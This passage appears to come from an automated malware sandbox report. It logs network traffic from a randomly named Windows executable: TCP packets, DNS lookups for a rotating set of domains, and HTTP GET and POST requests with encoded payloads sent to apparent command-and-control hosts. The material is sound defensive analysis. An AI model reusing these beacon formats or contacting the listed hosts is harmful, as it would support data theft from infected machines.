                                                              Nov 24, 2024 08:35:40.513669968 CET4992380192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:40.555841923 CET4993080192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:40.675776958 CET8049930207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:40.675879002 CET4993080192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:41.575139999 CET4993980192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:41.694794893 CET8049939207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:41.694972038 CET4993980192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:41.710814953 CET4993980192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:41.830404043 CET8049939207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:41.830457926 CET8049939207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:43.212044001 CET4993980192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:43.332397938 CET8049939207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:43.332573891 CET4993980192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:44.231172085 CET4994680192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:44.350941896 CET8049946207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:44.351237059 CET4994680192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:44.361748934 CET4994680192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:44.481298923 CET8049946207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:46.098805904 CET8049946207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:46.098917007 CET8049946207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:46.099077940 CET4994680192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:46.102341890 CET4994680192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:46.221848965 CET8049946207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:52.035595894 CET4996280192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:52.155122042 CET804996262.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:52.155242920 CET4996280192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:52.174568892 CET4996280192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:52.294074059 CET804996262.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:53.481556892 CET804996262.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:53.481683969 CET804996262.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:53.481760979 CET4996280192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:53.680838108 CET4996280192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:54.765430927 CET4996980192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:54.884949923 CET804996962.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:54.885159016 CET4996980192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:55.163640022 CET4996980192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:55.283179998 CET804996962.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:56.225536108 CET804996962.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:56.225622892 CET804996962.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:56.225668907 CET4996980192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:56.665596008 CET4996980192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:57.684091091 CET4997680192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:57.803515911 CET804997662.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:57.803786993 CET4997680192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:57.820583105 CET4997680192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:57.940056086 CET804997662.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:57.940129995 CET804997662.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:59.096466064 CET804997662.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:59.096504927 CET804997662.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:59.096570969 CET4997680192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:59.337213039 CET4997680192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:00.355895996 CET4998480192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:00.475394964 CET804998462.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:36:00.475583076 CET4998480192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:00.485506058 CET4998480192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:00.604979038 CET804998462.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:36:01.804045916 CET804998462.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:36:01.804090023 CET804998462.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:36:01.804433107 CET4998480192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:01.815226078 CET4998480192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:01.934676886 CET804998462.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:36:07.165694952 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:07.285614967 CET8049989104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:07.285782099 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:07.301098108 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:07.421557903 CET8049989104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:08.551302910 CET8049989104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:08.551362991 CET8049989104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:08.551618099 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:08.552274942 CET8049989104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:08.552359104 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:08.805989027 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:09.824836016 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:09.944289923 CET8049990104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:09.944457054 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:09.960706949 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:10.080272913 CET8049990104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:11.250920057 CET8049990104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:11.250972986 CET8049990104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:11.251193047 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:11.251488924 CET8049990104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:11.251552105 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:11.462121964 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:12.481261015 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:12.600905895 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:12.601021051 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:12.617458105 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:12.736932993 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:12.737122059 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:13.959289074 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:13.959383965 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:13.959439993 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:13.959477901 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:13.959526062 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:14.134351969 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:15.152704954 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:15.272300005 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:15.272573948 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:15.282082081 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:15.401536942 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:16.535341978 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:16.535377979 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:16.535636902 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:16.535698891 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:16.535754919 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:16.539700985 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:16.659250975 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:22.262887955 CET4999380192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:22.382694006 CET8049993185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:22.382837057 CET4999380192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:22.399091005 CET4999380192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:22.518707037 CET8049993185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:23.848117113 CET8049993185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:23.848475933 CET8049993185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:23.848584890 CET4999380192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:23.915350914 CET4999380192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:24.934314966 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:25.053968906 CET8049994185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:25.054132938 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:25.075448036 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:25.195178032 CET8049994185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:26.587272882 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:26.596673012 CET8049994185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:26.596704960 CET8049994185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:26.596915960 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:26.597105980 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:26.706779957 CET8049994185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:26.707289934 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:27.605417967 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:27.725164890 CET8049995185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:27.725337982 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:27.740742922 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:27.860382080 CET8049995185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:27.860392094 CET8049995185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:29.126285076 CET8049995185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:29.180862904 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:29.262885094 CET8049995185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:29.263022900 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:29.269685030 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:30.284854889 CET4999680192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:30.404484034 CET8049996185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:30.404681921 CET4999680192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:30.421518087 CET4999680192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:30.541502953 CET8049996185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:31.806364059 CET8049996185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:31.806391954 CET8049996185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:31.806562901 CET4999680192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:31.825962067 CET4999680192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:31.945452929 CET8049996185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:37.240674973 CET4999780192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:37.360265017 CET804999713.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:37.360385895 CET4999780192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:37.375343084 CET4999780192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:37.494906902 CET804999713.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:38.524811029 CET804999713.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:38.525049925 CET4999780192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:38.884129047 CET4999780192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:39.003704071 CET804999713.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:39.902905941 CET4999880192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:40.022574902 CET804999813.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:40.022758961 CET4999880192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:40.039668083 CET4999880192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:40.159244061 CET804999813.248.169.48192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 24, 2024 08:34:47.080921888 CET | 192.168.2.7 | 1.1.1.1 | 0xa227 | Standard query (0) | www.n-vis.group | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:04.715646982 CET | 192.168.2.7 | 1.1.1.1 | 0xcc69 | Standard query (0) | www.losmason.shop | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:19.795044899 CET | 192.168.2.7 | 1.1.1.1 | 0xa2a9 | Standard query (0) | www.dialagiaja18.buzz | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:34.982065916 CET | 192.168.2.7 | 1.1.1.1 | 0x79b7 | Standard query (0) | www.395608.men | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:35.993454933 CET | 192.168.2.7 | 1.1.1.1 | 0x79b7 | Standard query (0) | www.395608.men | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:51.107140064 CET | 192.168.2.7 | 1.1.1.1 | 0x17ae | Standard query (0) | www.gkfundeis.net | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:06.826025009 CET | 192.168.2.7 | 1.1.1.1 | 0x9935 | Standard query (0) | www.incgruporxat.click | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:21.559842110 CET | 192.168.2.7 | 1.1.1.1 | 0xde3a | Standard query (0) | www.holytur.net | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:36.840876102 CET | 192.168.2.7 | 1.1.1.1 | 0x691a | Standard query (0) | www.lirio.shop | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:51.528667927 CET | 192.168.2.7 | 1.1.1.1 | 0x32dc | Standard query (0) | www.espiritismo.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 24, 2024 08:34:47.824594021 CET | 1.1.1.1 | 192.168.2.7 | 0xa227 | No error (0) | www.n-vis.group | - | 90.156.201.74 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:34:47.824594021 CET | 1.1.1.1 | 192.168.2.7 | 0xa227 | No error (0) | www.n-vis.group | - | 90.156.201.18 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:34:47.824594021 CET | 1.1.1.1 | 192.168.2.7 | 0xa227 | No error (0) | www.n-vis.group | - | 90.156.201.66 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:34:47.824594021 CET | 1.1.1.1 | 192.168.2.7 | 0xa227 | No error (0) | www.n-vis.group | - | 90.156.201.112 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:05.112046957 CET | 1.1.1.1 | 192.168.2.7 | 0xcc69 | No error (0) | www.losmason.shop | - | 104.18.73.116 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:20.592747927 CET | 1.1.1.1 | 192.168.2.7 | 0xa2a9 | No error (0) | www.dialagiaja18.buzz | dialagiaja18.buzz | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:35:20.592747927 CET | 1.1.1.1 | 192.168.2.7 | 0xa2a9 | No error (0) | dialagiaja18.buzz | - | 66.29.148.78 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249638081 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | www.395608.men | lc7.cdnlaochen.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249638081 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | lc7.cdnlaochen.com | rexw2u6y-u.fly8899.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249638081 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | rexw2u6y-u.fly8899.com | 5w23j7d4.n.fly8899.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249638081 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | 5w23j7d4.n.fly8899.com | - | 207.148.38.19 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249638081 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | 5w23j7d4.n.fly8899.com | - | 103.144.218.47 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249638081 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | 5w23j7d4.n.fly8899.com | - | 66.203.149.226 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249716043 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | www.395608.men | lc7.cdnlaochen.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249716043 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | lc7.cdnlaochen.com | rexw2u6y-u.fly8899.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249716043 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | rexw2u6y-u.fly8899.com | 5w23j7d4.n.fly8899.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249716043 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | 5w23j7d4.n.fly8899.com | - | 207.148.38.19 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249716043 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | 5w23j7d4.n.fly8899.com | - | 103.144.218.47 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:36.249716043 CET | 1.1.1.1 | 192.168.2.7 | 0x79b7 | No error (0) | 5w23j7d4.n.fly8899.com | - | 66.203.149.226 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:52.031763077 CET | 1.1.1.1 | 192.168.2.7 | 0x17ae | No error (0) | www.gkfundeis.net | - | 62.116.130.8 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:07.162439108 CET | 1.1.1.1 | 192.168.2.7 | 0x9935 | No error (0) | www.incgruporxat.click | - | 104.21.88.139 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:07.162439108 CET | 1.1.1.1 | 192.168.2.7 | 0x9935 | No error (0) | www.incgruporxat.click | - | 172.67.180.24 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:22.257879972 CET | 1.1.1.1 | 192.168.2.7 | 0xde3a | No error (0) | www.holytur.net | holytur.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:36:22.257879972 CET | 1.1.1.1 | 192.168.2.7 | 0xde3a | No error (0) | holytur.net | - | 185.106.208.3 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:37.238022089 CET | 1.1.1.1 | 192.168.2.7 | 0x691a | No error (0) | www.lirio.shop | - | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:37.238022089 CET | 1.1.1.1 | 192.168.2.7 | 0x691a | No error (0) | www.lirio.shop | - | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:52.025985003 CET | 1.1.1.1 | 192.168.2.7 | 0x32dc | No error (0) | www.espiritismo.info | espiritismo.info | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:36:52.025985003 CET | 1.1.1.1 | 192.168.2.7 | 0x32dc | No error (0) | espiritismo.info | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:36:52.025985003 CET | 1.1.1.1 | 192.168.2.7 | 0x32dc | No error (0) | espiritismo.info | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49808 | 90.156.201.74 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:34:47.971215963 CET | 458 | OUT | GET /lqir/?Yh8=pl0prhRpj&jp30l4Dh=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCxZ4ItMmlXe/h8K4U/QJ8SGl7q4T2nCxnDw61Qoew6MKI2b3ZeSUeI0MH HTTP/1.1
                                                              Host: www.n-vis.group
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Nov 24, 2024 08:34:49.393601894 CET | 1236 | IN | HTTP/1.1 200 OK
                                                              Date: Sun, 24 Nov 2024 07:34:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Server: Apache
                                                              Cache-Control: max-age=0
                                                              Expires: Sun, 24 Nov 2024 07:34:49 GMT
                                                              Data Ascii: 5f2c<!doctype html><html lang="ru"><head>... Yandex.Metrika counter --><script type="text/javascript" > (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date(); for (var j = 0; j < document.scripts.length; j++) {if (document.scripts[j].src === r) { return; }} k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(97952577, "init", { clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true });</script><noscript><div><img src="https://mc.yandex.ru/watch/97952577" style="position:absolute; left:-9999px;" alt="" /></div></noscript>... /Yandex.Metrika counter --> <meta charset="UTF-8"> <title> </title> <meta name="description" content="


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49849 | 104.18.73.116 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:35:05.251280069 CET | 725 | OUT | POST /uktz/ HTTP/1.1
                                                              Host: www.losmason.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.losmason.shop
                                                              Referer: http://www.losmason.shop/uktz/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Ascii: jp30l4Dh=uPG0HG2Vv+DebPlyDbX9RfCpsFMmw2t4ynFlDzQUOpBsEhPmkBVNdJfgCLheiSzlC3GkMMpKxgQPqMuoPPwKv1hF+PZAODOfQrWbvZ6LHRVDASxqGRNsF6MBgUErzPp7P8dGFVICRXczr6CdbeIUkOAs63vseZL4XculB7JrqbGFPM0TscGozAw+m4u5E5UytXQwt4jFNrf3mFPSYw==
Nov 24, 2024 08:35:06.513047934 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 24 Nov 2024 07:35:06 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Location: https://www.losmason.shop/uktz/
                                                              CF-Cache-Status: DYNAMIC
                                                              Set-Cookie: __cf_bm=VoYyR8n5jsIP86zdibklXeYgFYxNwLRNuIBy8bgwuBo-1732433706-1.0.1.1-tpq5OQM6GckqDndZWDq36lEykalk_5HCIn35Z1fziGJgBSbiV6BgyvDakC3cFCiQirBzQHZJPAYNAhdptIGADg; path=/; expires=Sun, 24-Nov-24 08:05:06 GMT; domain=.www.losmason.shop; HttpOnly
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b8680ad572ad-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49855 | 104.18.73.116 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:35:07.952327967 CET | 745 | OUT | POST /uktz/ HTTP/1.1
                                                              Host: www.losmason.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.losmason.shop
                                                              Referer: http://www.losmason.shop/uktz/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Ascii: jp30l4Dh=uPG0HG2Vv+DeZv1yE8j9dvCqglMmrmt8ynZlD2gEJb1sEEzmnAVNQpfga7hH/iynC3KGMIhKxgEPqMeoM54NvlhH4PZCBjOfQrWbvdahHRNDADBqHzlvbKMCnUEr5vpnP8dBFX87RV0zr7SdbPIV9eAu3XuHP5iCWcKlIZ5Vztm/Ha1x2+KEtRIFi6KPTfJHvWUogaXkSc6drXuWONYMUuraDInIyDVKxRB9GAE=
Nov 24, 2024 08:35:09.187107086 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 24 Nov 2024 07:35:09 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Location: https://www.losmason.shop/uktz/
                                                              CF-Cache-Status: DYNAMIC
                                                              Set-Cookie: __cf_bm=pFQwRma3zlWxzyIhwPlA_fV8wvzI4aTqUoGrPAskl.U-1732433709-1.0.1.1-_2ULUrF_p81Jf8EMi15aRpVNFj.l6jFI_ObV88.zQdPRlEt38cVE.MEX6hBk02GnQBf6IWXfw716za7_B25WaA; path=/; expires=Sun, 24-Nov-24 08:05:09 GMT; domain=.www.losmason.shop; HttpOnly
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b878cbe60f42-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.749862104.18.73.11680520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:35:10.617640018 CET | 1758 | OUT | POST /uktz/ HTTP/1.1
                                                              Host: www.losmason.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.losmason.shop
